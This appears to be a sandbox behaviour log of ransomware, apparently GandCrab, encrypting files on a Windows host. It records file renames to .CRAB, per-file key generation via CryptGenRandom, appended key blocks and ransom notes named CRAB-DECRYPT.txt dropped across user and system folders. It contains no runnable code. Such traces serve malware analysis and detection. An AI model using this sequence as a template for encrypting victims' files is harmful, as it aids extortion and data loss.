File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 818707 True 1
Fn
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 818720 True 1
Fn
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 256 True 2
Fn
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 8 True 1
Fn
File Create filename = C:\System Volume Information\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\System Volume Information\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\System Volume Information\IndexerVolumeGuid, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\IndexerVolumeGuid, destination_filename = C:\System Volume Information\IndexerVolumeGuid.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\System Volume Information\IndexerVolumeGuid.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\IndexerVolumeGuid.CRAB, size = 1048576, size_out = 76 True 1
Fn
File Write filename = C:\System Volume Information\IndexerVolumeGuid.CRAB, size = 80 True 1
Fn
File Write filename = C:\System Volume Information\IndexerVolumeGuid.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\IndexerVolumeGuid.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\tracking.log, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\tracking.log, destination_filename = C:\System Volume Information\tracking.log.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\System Volume Information\tracking.log.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\tracking.log.CRAB, size = 1048576, size_out = 20480 True 1
Fn
File Write filename = C:\System Volume Information\tracking.log.CRAB, size = 20480 True 1
Fn
File Write filename = C:\System Volume Information\tracking.log.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\tracking.log.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\1SN5z4IGoXLWUASwR7.bmp, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\1SN5z4IGoXLWUASwR7.bmp, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\1SN5z4IGoXLWUASwR7.bmp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\1SN5z4IGoXLWUASwR7.bmp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\1SN5z4IGoXLWUASwR7.bmp.CRAB, size = 1048576, size_out = 1473 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\1SN5z4IGoXLWUASwR7.bmp.CRAB, size = 1488 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\1SN5z4IGoXLWUASwR7.bmp.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\1SN5z4IGoXLWUASwR7.bmp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\1ZUAICRNW.jpg, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\1ZUAICRNW.jpg, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\1ZUAICRNW.jpg.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\1ZUAICRNW.jpg.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\1ZUAICRNW.jpg.CRAB, size = 1048576, size_out = 82712 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\1ZUAICRNW.jpg.CRAB, size = 82720 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\1ZUAICRNW.jpg.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\1ZUAICRNW.jpg.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\2nMJKjaaVFC-pzpkY201.bmp, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\2nMJKjaaVFC-pzpkY201.bmp, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\2nMJKjaaVFC-pzpkY201.bmp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\2nMJKjaaVFC-pzpkY201.bmp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\2nMJKjaaVFC-pzpkY201.bmp.CRAB, size = 1048576, size_out = 66799 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\2nMJKjaaVFC-pzpkY201.bmp.CRAB, size = 66800 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\2nMJKjaaVFC-pzpkY201.bmp.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\2nMJKjaaVFC-pzpkY201.bmp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\4buX8EgM.flv, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\4buX8EgM.flv, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\4buX8EgM.flv.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\4buX8EgM.flv.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\4buX8EgM.flv.CRAB, size = 1048576, size_out = 42854 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\4buX8EgM.flv.CRAB, size = 42864 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\4buX8EgM.flv.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\4buX8EgM.flv.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\5mRMlfAb_YTR5CYhx.csv, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\5mRMlfAb_YTR5CYhx.csv, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\5mRMlfAb_YTR5CYhx.csv.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\5mRMlfAb_YTR5CYhx.csv.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\5mRMlfAb_YTR5CYhx.csv.CRAB, size = 1048576, size_out = 94936 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\5mRMlfAb_YTR5CYhx.csv.CRAB, size = 94944 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\5mRMlfAb_YTR5CYhx.csv.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\5mRMlfAb_YTR5CYhx.csv.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\6EvsKbCaqNJNGxe roT.bmp, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\6EvsKbCaqNJNGxe roT.bmp, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\6EvsKbCaqNJNGxe roT.bmp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\6EvsKbCaqNJNGxe roT.bmp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\6EvsKbCaqNJNGxe roT.bmp.CRAB, size = 1048576, size_out = 24972 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\6EvsKbCaqNJNGxe roT.bmp.CRAB, size = 24976 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\6EvsKbCaqNJNGxe roT.bmp.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\6EvsKbCaqNJNGxe roT.bmp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\6uLyRSDrcdR2G.png, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\6uLyRSDrcdR2G.png, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\6uLyRSDrcdR2G.png.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\6uLyRSDrcdR2G.png.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\6uLyRSDrcdR2G.png.CRAB, size = 1048576, size_out = 86645 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\6uLyRSDrcdR2G.png.CRAB, size = 86656 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\6uLyRSDrcdR2G.png.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\6uLyRSDrcdR2G.png.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Collab\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Collab\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Forms\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Forms\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData.CRAB, size = 1048576, size_out = 22 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData.CRAB, size = 32 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings.CRAB, size = 1048576, size_out = 24 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings.CRAB, size = 32 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.CRAB, size = 1048576, size_out = 10895 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.CRAB, size = 10896 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.CRAB, size = 1048576, size_out = 637 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.CRAB, size = 640 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
